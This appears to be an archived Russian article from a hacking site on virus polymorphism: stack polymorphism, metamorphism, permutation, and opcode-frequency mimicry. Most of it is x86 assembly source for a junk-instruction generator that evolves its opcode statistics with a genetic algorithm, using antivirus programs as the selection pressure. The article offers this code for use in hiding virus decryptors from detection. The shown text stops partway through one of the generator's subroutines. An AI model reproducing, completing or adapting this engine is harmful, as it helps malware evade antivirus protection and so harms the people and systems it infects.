Полиморфизм. Новые техники — HackZona.Ru

Полиморфизм. Новые техники

Полиморфизм. Новые техники

Тип статьи:
Со старой ХакЗоны.
Источник:
Полиморфизм всегда пользовался огромной популярностью у программистов. Но шло время и полиморфизм стал не столь популярен. Многие стали считать, что это вчерашний день. Я с ними соглашусь пожалуй, но как говорится: «Не все йогурты одинаково полезны». Классический полиморфизм в том виде, каком он был раньше, дальше использоваться не может. Сейчас мы рассмотрим последние техники полиморфизма и перспективы их применения.

1. Стэковый полиморфизм
Первым написал простейший стэковый движок Rajaat, данный движок был очень простым и маленьким. Далее насколько я помню, была парочка вариаций на данную тему. И закончилось всё когда объединились Z0MBiE и Vecna. Их творение получило модное громогласное название — «Kewl Mutation Engine». Данный движок без ложной скромности, можно назвать шедевром стэкового полиморфизма.

Теперь мы рассмотрим, в чём же заключается суть стэкового полиморфизма. Весь код который мы хотим скрыть(зашифровать) разбивается на двойные слова.

И после этого формируется следующий код:

push Шифруемый Код
push Шифруемый Код
… .............
push Шифруемый Код
jmp esp

Но такой код легко раскалывается даже алгоритмическими методами, без кодоэмуляции. Что делается чтобы этого не происходило? Производится линейная мутация кода, как вы видите инструкции в этом коде влияют только на стэк.

И мы можем отмутировать инструкцию — «push Шифруемый Код», следующим образом:

mov eax,234
mov edx, Шифруемый Код-234
add edx,eax
xchg edx,eax
push eax

И каждую инструкцию из этого блока мы то же можем сильно преобразовать. Этим мы заставим эмулировать, каждую инструкцию нашего кода. А как вы знаете, есть так называемая глубина эмуляции — это количество инструкций, на котором эмуляция прекращается.

Теперь давайте поговорим об актуальности стэкового полиморфизма и его перспективах. С выходом новых процессоров запрещено исполнение кода в стэке. И это используется как SP2 для Windows XP, так и будет использоваться в Longhorn. Так что актуальность данного вида полиморфизма стремится к нулю.

2. Метаморфизм
Я к данному виду полиморфизма отношу два типа мутаций:

Когда весь код, вместе с движком разбивается на блоки и затем производится перестановка данных блоков и их связь.
Когда весь код вируса представлен в виде псевдо кода и хранится в зашифрованном виде. И на базе этого псевдо кода, генерируется каждый раз новый код.
Данные техники является достаточно сложными и не очень приятными. По следующим причинам:

И в первом, и втором случаях достаточно сложно написать универсальный движок. По этой причине каждый раз эту технику необхоимо реализовывать заново.
В первом случае получается ограниченное количество мутаций.
Во втором случае возможно детектирование по зашифрованной части кода.
3. Пермутация
Пермутация это преобразование уже готового кода. В этом направлении на данный момент наиболее продвинулся Z0MBiE. Но ещё в его старых движках, встречались благодарности некому Lord_ASD. Далее после него, в этой области продвинулись Vecna и SBVC. В чём же заключается пермутация? Базовым алгоритмом пермутирующих движков является дизассемблирование кода с последующей его мутацией и ассемблированием.

Теперь рассмотрим пример алгоритма простейшего пермутирующего движка:

Дизассемблируется по длинам все инструкции нашего кода и отмечатся условные и безусловные переходы.
Инструкции заменяются синонимичными и между ними вставляются мусорные инструкции.
Например:

;----[Были инструкции]----------------;
… ............
mov eax,12345678
push eax
… ............

Далее эти инструкции преобразовались к виду:

;----[Стали инструкции]---------------;
… ............
xor eax,eax
nop
add eax,12345678
nop
push eax
… .............

Пересчитываются все переходы.
Данный вид полиморфизма является одним из самых перспективных. По следующим причинам:

Удобство (не лёгкость) написания движка
Высокий уровень мутаций
Необходимость эмуляции всех инструкций
Не смотря на то, что данный вид полиморфизма известен уже достаточно давно, он не получил большого распространения, из-за сложности реализации.

4. Статистические методы и Генетические алгоритмы
В данной части рассмотрим наиболее оптимальные модификации классических полиморфных движков.

1) Статистические методы

Вы некогда не задумывались почему, ваши полиморфные движки так быстро детектируются? Вроде и инструкции использовали те же, что и обычные программы, и все виды переходов и подпрограмм. А всё равно детектируются!

Да, инструкции были использованы те же, но в том ли количестве? Антивирусы так же смотрят на статистику встречи опкодов. Вы уже наверное догадались о чём пойдёт речь дальше?

Для того, чтобы определить с какой вероятностью генерировать, ту или иную инструкцию. Мы должны собрать статистические данные по обыкновенным программам. Для этого мы можем либо написать сами программу, либо воспользоваться программой от Z0MBiE. После того, как мы проанализировали на количество различных опкодов, множество программ. Мы должны рассчитать мат. ожидания (средние) встречи различных опкодов. И на основе их, мы построим таблицу вероятностей встречи тех или иных опкодов в обыкновенных программах.

После этого ваши декрипторы будут практически идентичны обыкновенным программам по статиситике опкодов.

2) Генетические алгоритмы

Теория Дарвина утверждает, что все организмы изменяются и совершенствуются в процессе эволюции. Более приспособленные особи к своей среде обитания имеют больше возможностей выжить и принести потомство. Благодаря наследственности (генетической информации) родители передают потомкам, наиболее необходимую для выживания в данной среде информацию. Из-за этого механизма весь вид будет изменяться и в конце концов, его выживаемость значительно увеличиться.

Генетический алгоритм — это реализация эволюционной теории в виде программы. ГА работают с популяцией особей и и расставляя им вероятности по характеристикам её «выживаемости» или «приспособленности». Наиболее приспособленные особи — это те особи которые достаточно «хорошо» решают поставленную задачу. Данные особи скрещиваются друг с другом. Поэтому все хорошие характеристики остаются в популяции, а плохие уходят вместе с их не «приспособленными» носителями.

Генетические Алгоритмы чаще всего используют две функции:

Кроссовер — это скрещивание наиболее выживаемых особей.
Мутация — это изменение случайных характеристик особи.
Теперь перейдём к реализации эволюционных алгоритмов в полиморфных движках. Мы будем применять ГА к нашему полиморфному движку с статистическими вероятностями.

Алгоритм генератора мусора с статистическими вероятностями и ГА:

Генерируется код по статистическим вероятностям
Выбираются случайно и мутируют два стат. признака (1 раз в 10 поколений). Это наша реализация мутации.
Выбираются два определяющих стат. признака и изменяются каждое поколение. Это наш кроссовер.
В качестве отсеивающего признака эволюции будут выступать антивирусные программы.

Если особь активна, считается что она прошла отбор. И она продолжает свой подъём или спуск по лестнице эволюции.

В качестве примера реализации данной техники приводится:

;----[Резать здесь]--------------------------------------------------------;
; ;
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
; ГЕНЕРАТОР МУСОРНЫХ ИНСТРУКЦИЙ V.0.4(x) 2004 СЛОН slon.wronger.com ;
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
; Использование: mov edi, БУФЕР ДЛЯ КОДА ;
; mov ecx, ДЛИНА КОДА ;
; mov ebx, НЕ ИСПОЛЬЗУЕМЫЕ РЕГИСТРЫ(_all) ;
; call garbage ;
;--------------------------------------------------------------------------;
; Результат: сгенерированный код в edi ;
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
; ВЕРСИЯ 0.3 Генерация инструкций по заданным статистическим ;
; характерстикиам(они получены в результате анализа ;
; большого количества файлов формата «PE») ;
;--------------------------------------------------------------------------;
; ВЕРСИЯ 0.2 Добавлены новые инструкции x86, так же добавлены ;
; инструкции сопроцессора (x87) ;
;--------------------------------------------------------------------------;
; ВЕРСИЯ 0.1 Реализация многих инструкций x86 процессора, ;
; случайная комбинация инструкций ;
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;

;----[Главная подпрограмма генератора мусора]------------------------------;

garbage:; Подпрограмма генерации
; мусорных инструкций
push edx; Сохраняем в стэке
push ecx; edx, ecx, esi, ebp, ecx,
push esi; eax
push ebp ;
push ebx ;
push eax ;

call delta_offset;
delta_offset: pop ebp; Получаем дельта смещение
sub ebp,offset delta_offset ;

call r_init; Инициалицируем ГСЧ
__st__:
test ecx,ecx; Если все инструкции
jz landing; сгенерированы, то на выход

mov eax,21; Выбираем случайным образом
call brandom32; вариант генерации мусорных
; инструкций
shl eax,1; Умножаем eax на 2

call __freq__; Выбираем блок инструкций
; по статистической
; вероятности
test eax,eax; Если не выбрали, то
jz __st__; пытаемся снова

lea esi,[ebp+mega_table]; В esi смещение на таблицу
; относительных смещений
add esi,eax; к esi добавляем eax
xor eax,eax; Обнуляем eax
lodsw; В ax загружаем
; относительное смещение от
; метки __st__
lea esi,[ebp+__st__]; В esi кладём смещение
; метки __st__
add eax,esi; Добавляем смещение
; подпрограммы
call eax; Вызываем её
jmp __st__; Переход на __st__

;----[Завершение работы генератора мусора]---------------------------------;

landing:
inc [ebp+__generation]; Увеличиваем счётчик
; поколений

cmp [ebp+__generation],10; Если это не 10 поколение,
jne __ne__; то идём на выход

mov [ebp+__generation],0; Сбрасываем счётчик
; поколений

call gen_mutation; Вызываем изменение 1 случ.
; мат. ожидания

mov [ebp+__cross1],ecx; Выбираем 1 опр. фактор
; эволюции

call gen_mutation; Вызываем изменение 2 случ.
; мат. ожидания

mov [ebp+__cross2],ecx; Выбираем 2 опр. фактор
; эволюции
__ne__:
mov ecx,[ebp+__cross1]; Производим селекцию 1 опр.
call gen_crossover; фактора эволюции

mov ecx,[ebp+__cross1]; Производим селекцию 2 опр.
call gen_crossover; фактора эволюции

pop eax ;
pop ebx ;
pop ebp ;
pop esi; Восстанавливаем регистры
pop ecx ;
pop edx ;

ret; Возврат из подпрограммы
;----[Подпрограмма выбора стат. вероятностей]------------------------------;

__freq__:
push eax; Сохраняем eax в стэке

lea esi,[ebp+__freq_table]; Загружаем указатель на
add esi,eax; таблицу с мат. ожиданиями
lodsw; Загружаем в ax мат.
; ожидание
mov edx,eax; Переносим её в edx

mov eax,1001; Генеририуем случайное
call brandom32; число в интервале 0..1000

cmp edx,eax; Проверяем попали ли мы?
jge __exit__; Если попали, то на выход
mov 4 ptr [esp],0; Нет обнулим верхушку
; стэка
__exit__:
pop eax; Восстанавливаем eax из
; стэка
ret; Возврат из подпрограммы

;----[Подпрограмма изменения мат. ожидания]--------------------------------;

gen_mutation:
mov eax,21; Выбираем случайным образом
call brandom32; вариант генерации мусорных
; инструкций
shl eax,1; Умножаем eax на 2

lea esi,[ebp+__freq_table]; В esi смещение на таблицу
; мат. ожиданий опкодов
add esi,eax; к esi добавляем eax
xor eax,eax; Обнуляем eax
lodsw; В ax загружаем мат.
; ожидание

call brandom32; Генерируем СЧ в диапазоне
sub esi,2; 0… мат.ожидание-1 и
; уменьшаем esi на 2
sub 2 ptr [esi],ax; Вычитаем из мат. ожидания
; Наше случаное число
push eax; Сохраняем в стэке СЧ

mov eax,21; Выбираем случайным образом
call brandom32; вариант генерации мусорных
; инструкций
shl eax,1; Умножаем eax на 2

mov ecx,eax ;

lea esi,[ebp+__freq_table]; В esi смещение на таблицу
; мат. ожиданий опкодов
add esi,eax; к esi добавляем eax

pop eax; Восстанавливаем из стэка
; СЧ
add 2 ptr [esi],ax; И добавляем его к другому
; Мат. ожиданию
ret; Возврат из подпрограммы

;----[Подпрограмма селекции опр. фактора эволюции]-------------------------;

gen_crossover:

mov eax,21; Выбираем случайным образом
call brandom32; вариант генерации мусорных
; инструкций
shl eax,1; Умножаем eax на 2

lea esi,[ebp+__freq_table]; В esi смещение на таблицу
; мат. ожиданий опкодов
add esi,eax; к esi добавляем eax
xor eax,eax; Обнуляем eax
lodsw; В ax загружаем мат.
; ожидание

call brandom32; Генерируем СЧ в диапазоне
sub esi,2; 0… мат.ожидание-1 и
; уменьшаем esi на 2
sub 2 ptr [esi],ax; Вычитаем из мат. ожидания
; Наше случаное число
push eax; Сохраняем в стэке СЧ

lea esi,[ebp+__freq_table]; В esi смещение на таблицу
; мат. ожиданий опкодов
add esi,ecx; к esi добавляем eax

pop eax; Восстанавливаем из стэка
; СЧ
add 2 ptr [esi],ax; И добавляем его к другому
; Мат. ожиданию
ret; Возврат из подпрограммы


;----[Генерация инструкций JXX SHORT — 0x70..0x7f]-------------------------;

__jxx_short:
mov eax,50; Генерируем случайное число
call brandom32; в диапазоне 0..49
push eax; Сохраняем eax в стэке
add eax,2; Добавляем длину перехода
cmp eax,ecx; Проверяем не больше ли
; длины
; Всех инструкций
pop eax; Восстанавливаем из стэка
; eax
jle __gen1__; Если число превышает длину
ret; то выходим из подпрограммы
__gen1__: ;
push eax; Кладём eax опять в стэк
mov eax,10; Выбираем случайным образом
call brandom32; число от 0..9
add al,70h; Добавляем 70h
stosb; и кладём его в буфер
pop eax; Вынимаем из стэка eax и
stosb; кладём в буфер
mov edx,eax; Кладём число в edx
push ecx; Сохраняем ecx в стэке
mov ecx,edx; Генерируем рекурсивно
call garbage; мусор между переходом
pop ecx; Восстанавливаем ecx
; В итоге у нас получается
; случайно выбранный,
; условный переход:
; .........................
; jae next
; mov eax,0
; next: nop
; .........................
sub ecx,2; Уменьшаем счётчик на 2
sub ecx,edx; И на длину перехода
ret; Возврат из подпрограммы

;----[Генерация инструкций NOT/NEG — 0xf7]---------------------------------;

__not_r32:
cmp cl,2; Если длина генерируемой
jge __g1__; инструкции меньше 2, то
ret; Возврат из подпрограммы
__g1__:
mov al,0f7h; Помещаем в al — 0f7h
stosb; и кладём его в буфер
mov dl,0d0h; Помещаем в dl — 0d0h
mov eax,2; Генерируем случайное число
call brandom32; в диапазоне 0..1
shl eax,3; Умножаем его на 8
add dl,al; Добавляем к dl — al
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,dl; Добавляем к al — dl
stosb; и кладём его в буфер
; В итоге у нас получается
; случайно выбранная
; инструкция NOT/NEG:
; .........................
; not eax
; .........................
sub ecx,2; Уменьшаем счётчик на 2
ret; Возврат из подпрограммы

;----[Генерация инструкций JXX NEAR — 0x0f 0x80..0x0f 0x89]----------------;

__jxx_near:
mov eax,50; Генерируем случайное число
call brandom32; в диапазоне 0..49
push eax; Сохраняем его в стэке
add eax,6; Добавляем длину перехода
cmp eax,ecx; Проверяем не больше длины
; Всех инструкций
pop eax; Восстанавливаем eax из
; стэка
jle __gen2__; Если число превышает длину
ret; то выходим из подпрограммы
__gen2__: ;
push eax; Сохраняем в стэке eax
mov al,0fh; Помещаем в al — 0fh
stosb; и кладём его в буфер
mov eax,10; Выбираем случайным образом
call brandom32; число от 0..9
;
add al,80h; Добавляем 80h
stosb; и кладём его в буфер
pop eax; Вынимаем из стэка eax
stosd; Помещаем его в буфер
mov edx,eax; Кладём в edx — eax
push ecx; Сохраняем ecx в стэке
mov ecx,edx; Генерируем рекурсивно
call garbage; мусор между переходом
pop ecx; Восстанавливаем ecx
; В итоге у нас получается
; случайно выбранный,
; условный, переход:
; .........................
; je next
; push 0
; next: push 64
; .........................
sub ecx,6; Уменьшаем счётчик на 6
sub ecx,edx; И на длину инструкций
;
ret; Возврат из подпрограммы

;----[Генерация инструкций сопроцессора — 0xdc]----------------------------;

__x87:
cmp cl,2; Если длина генерируемой
jge __g2__; инструкции меньше 2, то
ret; Возврат из подпрограммы
__g2__:
mov al,0dch; Кладём в al — 0dch
stosb; И помещаем al в буфер
mov eax,02fh; Генерируем случайное число
call brandom32; в интервале 0..2eh
add al,0c0h; Добавляем к числу 0c0h
stosb; и помещаем сумму в буфер
; В итоге у нас получается
; случайно выбранная
; инструкция сопроцессора:
; .........................
; fadd st(0),st
; .........................
sub ecx,2; Уменьшаем счётчик на 2
ret; Возврат из подпрограммы

;----[Генерация инструкций сравнения — 0x3a]-------------------------------;

__cmp_r32_r32:
cmp cl,2; Если длина генерируемой
jge __g3__; инструкции меньше 2, то
ret; Возврат из подпрограммы
__g3__:
mov dl,3ah; Помещаем в dl — 03ah
mov eax,3; Получаем случайное число
call brandom32; в диапазоне 0..2
add al,dl; Добавляем к al — dl
stosb; Затем помещаем al в буфер
call rnd_reg; Получаем случайный регистр
shl eax,3; Умножаем eax на 8
add al,0c0h; Добавляем к al — 0c0h
mov dl,al; помещаем в dl — al
call rnd_reg; Получаем случайный регистр
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкция CMP:
; .........................
; cmp eax,esp
; .........................
sub ecx,2; Уменьшаем счётчик на 2
ret; Возврат из подпрограммы

;----[Генерация инструкций XOR — 0x33]-------------------------------------;

__xor_r32_r32:
cmp cl,2; Если длина генерируемой
jge __g4__; инструкции меньше 2, то
ret; Возврат из подпрограммы
__g4__:
mov al,33h; Помещаем в al — 33h
stosb; И затем кладём это в буфер
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
shl eax,3; Умножаем eax на 8
add al,0c0h; Добавляем к al — 0c0h
mov dl,al; помещаем в dl — al
call rnd_reg; Получаем случайный регистр
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкция XOR:
; .........................
; xor eax,esp
; .........................
sub ecx,2; Уменьшаем счётчик на 2
ret; Возврат из подпрограммы

;----[Генерация инструкций TEST — 0x84]------------------------------------;

__test_r32_r32:
cmp cl,2; Если длина генерируемой
jge __g5__; инструкции меньше 2, то
ret; Возврат из подпрограммы
__g5__:
mov dl,084h; Помещаем в dl — 084h
mov eax,2; Получаем случайное число
call brandom32; в диапазоне 0..1
add al,dl; Добавляем к al — dl
stosb; И затем кладём это в буфер
call rnd_reg; Вызываем подпрограмму
; получения случайного
; регистра
add al,0c0h; Добавляем к al — 0c0h
mov dl,al; помещаем в dl — al
call rnd_reg; Получаем случайный регистр
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкция TEST:
; .........................
; test eax,esp
; .........................
sub ecx,2; Уменьшаем счётчик на 2
ret; Возврат из подпрограммы

;----[Генерация инструкций MOV, XCHG — 0x87,0x89,0x8b]---------------------;

__mov_r32_r32:
cmp cl,2; Если длина генерируемой
jge __g6__; инструкции меньше 2, то
ret; Возврат из подпрограммы
__g6__:
mov eax,3; Генерируем СЧ в
call brandom32; диапазоне 0..2

test eax,eax; Проверяем, как опкод мы
jnz __ng1__; будем генерировать
; Если не 0, то 0x8b

mov eax,10; Генерируем СЧ в
call brandom32; диапазоне 0..9

test eax,eax; Проверяем какой опкод мы
jnz __ng2__; будем генерировать
; Если не 0, то 0x89

mov al,87h; Будем генерировать 0x87
jmp __ag1__; Идём дальше
__ng2__:
mov al,89h; Будем генерировать 0x89
jmp __ag1__; Идём дальше
__ng1__:
mov al,8bh; Помещаем в al — 8bh
__ag1__:
stosb; Потом помещаем al в буфер
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
shl eax,3; Умножаем eax на 8
add al,0c0h; Добавляем к al — 0c0h
mov dl,al; помещаем в dl — al
call free_reg; Получаем случайный регистр
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкция MOV, XCHG:
; .........................
; mov eax,esp
; .........................
sub ecx,2; Уменьшаем счётчик на 2
ret; Возврат из подпрограммы

;----[Генерация инструкций PUSH/POP — 0x50..0x57;0x58..0x5f]---------------;

__push_r32:
mov eax,10; Генерируем СЧ в
call brandom32; диапазоне 0..9
mov edx,eax; Кладём его в edx
add al,2; Доавляем к al — 2

cmp eax,ecx; Если длина генерируемой
jle __g7__; инструкции меньше 2
; и длины мусора, то
ret; Возврат из подпрограммы
__g7__:
call free_reg; Получаем случайный регистр
add al,50h; Добавляем к al — 50h
stosb; Кладём al в буфер

push ecx; Сораняем ecx в стэке
mov ecx,edx; Генерируем серию
call garbage; мусорных инструкций
pop ecx; Вынимаем ecx из стэка

call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,58h; Добавляем к al — 58h
stosb; И опять кладём al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции PUSH/POP:
; .........................
; push eax
; mov eax,2
; pop ecx
; .........................
sub ecx,edx; Уменьшаем счётчик на edx
sub ecx,2; Уменьшаем счётчик на — 2
ret; Возврат из подпрограммы

;----[Генерация инструкций MOV — 0x0b8]------------------------------------;

__mov_r32_imm32:
cmp cl,5; Если длина генерируемой
jge __g8__; инструкции меньше 5, то
ret; Возврат из подпрограммы
__g8__:;
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,0b8h; Добавляем к al — 0b8h
stosb; И кладём al в буфер
xor eax,eax; Обнуляем eax
dec eax; Теперь eax = 0ffffffffh
call brandom32; Генерируем случайное
stosd; число
; В итоге у нас получается
; случайно выбранная
; инструкции MOV:
; .........................
; mov eax,12345678
; .........................
sub ecx,5; Уменьшаем счётчик на 5
ret; Возврат из подпрограммы

;----[Генерация инструкций JMP SHORT — 0xeb]-------------------------------;

__jmp_short:
cmp cl,2; Если длина генерируемой
jg __g9__; инструкции меньше 2, то
ret; Воврат из подпрограммы
__g9__:
mov eax,50; Генерируем случайное число
call brandom32; в диапазоне 0..49
push eax; Сохраняем его в стэке
add eax,2; Добавляем длину перехода
cmp eax,ecx; Проверяем не больше длины
pop eax; Восстанавливаем из стэка
jle __gen3__; Если число превышает длину
ret; то выходим из подпрограммы
__gen3__: ;
push eax; Сохраняем в стэке eax
mov al,0ebh; Кладём в al — 0ebh
stosb; И кладём al в буфер
pop eax; Восстанавливаем из стэка
stosb; Помещаем его в буфер
mov edx,eax; Кладём в edx — eax
push ecx; Сохраняем ecx в стэке
mov ecx,edx; Генерируем рекурсивно
call garbage; мусор между переходом
pop ecx; Восстанавливаем ecx
; В итоге у нас получается
; случайно выбранная
; инструкции JMP SHORT:
; .........................
; jmp next
; mov ax,22
; next: nop
; .........................
sub ecx,2; Уменьшаем счётчик на 2
sub ecx,edx; И на длину инструкций
;
ret; Возврат из подпрограммы

;----[Генерация инструкций ADD — 0x81]-------------------------------------;

__add_r32_imm32:
cmp cl,6; Если длина генерируемой
jge g10__; инструкции меньше 6, то
ret; Возврат из подпрограммы
g10__:
mov al,81h; Кладём в al — 81h
stosb; И помещаем al в буфер
mov eax,4; Получаем случайное число
call brandom32; в диапазоне от 0..9
add al,0ch; Добавляем к нему — 0ch
shl al,4; Умножаем al на 16
mov dl,al; Кладём в dl — al
mov eax,2; Получаем случайное число
call brandom32; в диапазоне от 0..1
shl al,3; Умножаем al на 8
add dl,al; Добавляем к dl — al
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,dl; Добавляем к al — dl
stosb; И кладём al в буфер
xor eax,eax; Обнуляем eax
dec eax; Теперь eax = 0ffffffffh
call brandom32; Генерируем случайное
stosd; число и кладём его в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции ADD:
; .........................
; add eax,12345678
; .........................
sub ecx,6; Уменьшаем счётчик на 6
ret; Возврат из подпрограммы

;----[Генерация инструкций LEA — 0x8d]-------------------------------------;

__lea_r32_imm32:
cmp cl,6; Если длина генерируемой
jge __g11__; инструкции меньше 6, то
ret; Возврат из подпрограммы
__g11__:
mov al,8dh; Кладём в al — 8dh
stosb; И помещаем al в буфер
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
shl eax,3; Умножаем eax на — 8
add al,5; Добавляем к al — 5
stosb; И кладём al в буфер
xor eax,eax; Обнуляем eax
dec eax; Теперь eax = 0ffffffffh
call brandom32; Генерируем случайное число
stosd; И кладём его в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции LEA:
; .........................
; lea eax,[12345678]
; .........................
sub ecx,6; Уменьшаем счётчик на 6
ret; Возврат из подпрограммы

;----[Генерация инструкций CALL NEAR — 0xe8]-------------------------------;

__call_near:
mov eax,50; Генерируем случайное число
call brandom32; в диапазоне 0..49
mov edx,eax; И кладём его в edx

mov eax,50; Генерируем случайное число
call brandom32; в диапазоне 0..49
push eax; Сохраняем его в стэке
add eax,11; Добавляем длину перехода
add eax,edx; Добавляем к eax — edx
cmp eax,ecx; Проверяем не больше длины
pop eax; Восстанавливаем из стэка
jle __gen4__; Если число превышает
; длину, то
ret; Возврат из подпрограммы
__gen4__:
push edx; Сохраняем в стэке edx
push eax; Сохраняем в стэке eax
mov al,0e8h; Кладём в al — 0e8h
stosb; И помещаем al в буфер
mov eax,[esp]; Восстанавливаем eax
inc eax; Увеличиваем eax на — 1
stosd; Кладём eax в буфер
xor eax,eax; Обнуляем eax
dec eax; Теперь в eax — 0ffffffffh
call brandom32; Генерируем СЧ и
stosb; Кладём его в буфер
pop edx; Вынимаем из стэка в edx
push ecx; Сохраняем ecx в стэке
mov ecx,edx; Генерируем рекурсивно
call garbage; мусор между переходом
pop ecx; Восстанавливаем ecx

mov al,55h;
stosb; Кладём в буфер 055h
mov ax,0ec8bh;
stosw; Кладём в буфер 0ec8bh

push edx; Кладём edx в стэк

mov edx,[esp+4]; Вынимаем из стэка в edx
push ecx; Сохраняем ecx в стэке
mov ecx,edx; Генерируем рекурсивно
call garbage; мусор между переходом
pop ecx; Восстанавливаем ecx

mov al,5dh; Кладём в буфер 05dh
stosb;

call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,58h; Добавляем к al — 58
stosb; И опять кладём al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкция CALL NEAR:
; .........................
; mov eax,12345678h
; call next
; add edx,34567h
; next:
; push ebp
; mov ebp,esp
; xor eax,edx
; pop ebp
; pop edx
; ..........................
sub ecx,11; Уменьшаем счётчик на 11
pop edx; Вынимаем из стэка в edx
sub ecx,edx; Уменьшаем на длину
; инструкций
pop edx; Вынимаем из стэка в edx
sub ecx,edx; Уменьшаем на длину
; инструкций
ret; Возврат из подпрограммы

;----[Генерация инструкций SHL — 0xc1]-------------------------------------;

__shl_r32_imm8:
cmp cl,3; Если длина генерируемой
jge __g12__; инструкции меньше 3, то
ret; Возврат из подпрограммы
__g12__:
mov al,0c1h; Кладём в al — 0c1h
stosb; И помещаем al в буфер
mov eax,6; Генерируем случайное число
call brandom32; в диапазоне 0..5
shl eax,3; Умножаем его на 8
add al,0c0h; Добавляем к нему — 0c0h
mov dl,al; Помещаем в dl — al
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер
mov eax,256; Генерируем случайное число
call brandom32; в диапазоне 0..255
stosb; И кладём его в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции SHL,ROL, ...:
; .........................
; shl ebp,04
; .........................
sub ecx,3; Уменьшаем счётчик на 3
ret; Возврат из подпрограммы

;----[Генерация иструкций XADD — 0x0f 0x0a3 ...]---------------------------;

__xadd_r32_r32:
cmp cl,3; Если длина генерируемой
jge __g13__; инструкции меньше 6, то
ret; Возврат из подпрограммы
__g13__:
mov al,0fh; Кладём в al — 0fh
stosb; И помещаем al в буфер
lea esi,[ebp+__3_byte_opcode]; Кладём в esi указатель на
; таблицу частей 3-х байтных
; инструкций
mov eax,14; Генерируем случайное число
call brandom32; в диапазоне 0..13
add esi,eax; Прибавляем к esi — eax
movsb; Перемещаем байт в буфер
mov dl,0c0h; Кладём в dl — 0с0h
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
shl eax,3; Умножаем eax на 8
add dl,al; Добавляем к dl — al
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции XADD,IMUL, ...:
; .........................
; xadd eax,eax
; .........................
sub ecx,3; Уменьшаем счётчик на 3
ret; Возврат из подпрограммы

;----[Генерация инструкций MOV — 0x66 0xb8..0xbf]--------------------------;

__mov_r16_imm16:
cmp cl,4; Если длина генерируемой
jge __g14__; инструкции меньше 4, то
ret; Возврат из подпрограммы
__g14__:
mov al,066h; Кладём в al — 066h
stosb; И помещаем al в буфер
mov dl,0b8h; Помещаем в dl — 0b8h
call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер
xor eax,eax; Обнуляем eax
dec eax; Теперь в eax — 0ffffffffh
call brandom32; Генерируем СЧ
stosw; И помещаем его в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции MOV:
; .........................
; mov ax,3452
; .........................
sub ecx,4; Уменьшаем счётчик на 4
ret; Возврат из подпрограммы

;----[Генерация инструкций CMOVA — 0x0f 0x40..0x4f]------------------------;

__cmova_r32_r32:
cmp cl,3; Если длина генерируемой
jge __g15__; инструкции меньше 6, то
ret; Возврат из подпрограммы
__g15__:
mov al,0fh; Кладём в al — 0fh
stosb; И помещаем al в буфер
mov eax,15; Генерируем случайное число
call brandom32; в диапазоне 0..14
add al,40h; Добавляем к al — 40h
stosb; И помещаем al в буфер
call free_reg; Берём случайный регистр
shl eax,3; Умножаем его на 8
add al,0c0h; Добавляем к нему — 0c0h
mov dl,al; Помещаем в dl — al
call rnd_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции CMOVA:
; .........................
; cmova eax,edx
; .........................
sub ecx,3; Уменьшаем счётчик на 3
ret; Возврат из подпрограммы

;----[Генерация инструкций PUSH/POP — 0x6a, 0x0ff 0x0f0..0x0f7;0x58..0x5f]-;

__push_r32_2:
mov eax,10; Генерируем СЧ
call brandom32; в диапазоне 0..9
mov edx,eax; Кладём в edx — eax
add al,3; Добавляем к al — 3

cmp eax,ecx; Если длина генерируемых
jle __g16__; инструкций меньше, то
ret; Возврат из подпрограммы
__g16__:
mov eax,4; Генерируем СЧ
call brandom32; в диапазоне 0..3
test eax,eax; Если оно не равно 0, то
jnz __ng3__; Переходим на метку __ng3__

mov al,6ah; Кладём в al — 06ah
stosb; Помещаем al в буфер
xor eax,eax; Обнуляем eax
dec eax; Теперь в eax — 0ffffffffh
call brandom32; Генерируем СЧ
stosb; Кладём в буфер
jmp __gen5__; Идём на генерацию мусора
__ng3__:
push edx; Сохраняем в стэке edx

mov al,0ffh; Кладём в al — 0ffh
stosb; И помещаем al в буфер
mov dl,0f0h; Кладём в dl — 0f0h
call free_reg; Получаем свободный регистр
add al,dl; Добавляем к al — dl
stosb; И помещаем al в буфер

pop edx; Вынимаем из стэка edx
__gen5__:
push ecx; Сохраняем ecx в стэке
mov ecx,edx; Кладём в ecx — edx
call garbage; Генериуем серию мусора
pop ecx; Восстанавливаем ecx из
; стэка

